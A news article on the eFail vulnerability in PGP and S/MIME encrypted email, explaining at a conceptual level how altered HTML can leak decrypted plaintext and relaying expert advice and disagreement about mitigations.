The ubiquitous email encryption schemes PGP and S/MIME are vulnerable to attack, according to a group of German and Belgian researchers who posted their findings on Monday. The weakness could allow a hacker to expose plaintext versions of encrypted messages—a nightmare scenario for users who rely on encrypted email to protect their privacy, security, and safety.

The weakness, dubbed eFail, emerges when an attacker who has already managed to intercept your encrypted emails manipulates how the message will process its HTML elements, like images and multimedia styling. When the recipient gets the altered message and their email client—like Outlook or Apple Mail—decrypts it, the email program will also load the external multimedia components through the maliciously altered channel, allowing the attacker to grab the plaintext of the message.

You've Got eFail

The eFail attack requires hackers to have a high level of access in the first place that, in itself, is difficult to achieve. They need to already be able to intercept encrypted messages, before they begin waylaying messages to alter them. PGP is a classic end-to-end encryption scheme that has been a go-to for secure consumer email since the late 1990s because of the free, open-source standard known as OpenPGP. But the whole point of doing the extra work to keep data encrypted from the time it leaves the sender to the time it displays for the receiver is to reduce the risk of access attacks—even if someone can tap into your encrypted messages, the data will still be unreadable. eFail is an example of these secondary protections failing.

Sebastian Schinzel, one of the researchers on the project who runs the IT security lab at the Münster University of Applied Sciences, tweeted early Monday morning that, "There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now." The Electronic Frontier Foundation issued a similar warning, that "users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email," until there are patches or other mitigations for vulnerable email clients.

This advice has seemed overly reactionary to some cryptographers, though, who argue that some people can't simply switch to other secure platforms and that encrypted email is still better than nothing. The bigger issue, they argue, is the lack of unity in securing email in the first place and dealing with problems as they arise.

'The core architecture of PGP encryption is very dated.' Kenn White, Open Crypto Audit Project

"For people who must use encrypted mail, there's not consensus yet on the best course of action," says Kenn White, director of the Open Crypto Audit Project. "Many people have criticized the EFF guidance, which is basically to stop using encrypted mail. I'm not sure such advice is warranted, or even practical." One option for now is to patch your encrypted email plugins whenever those updates come through, and disable as much remote image and custom HTML execution as possible.

Essentially, you want to set your PGP plugin to only show you the text of a message and not any of the fancy formatting or other media the sender included. The eFail researchers did find, though, that many email clients are overly lax in interacting with remote servers, meaning that even when you add restrictions you may not be able to completely control these interactions with potentially sketchy servers.

Ignored Warnings

Researchers have known about the theoretical underpinnings of the eFail attack since the early 2000s, and some implementations of the OpenPGP standard already protect against it. Since the attack centers around manipulating custom HTML, systems can and should be able to flag that the email the target actually receives has been altered. The message authentication check for PGP is called "Modification Detection Code," and MDCs indicate the integrity of a message's authentication. But eFail highlights that many email clients will tolerate messages with invalid or missing MDCs instead of dropping them to ease friction between different PGP implementations.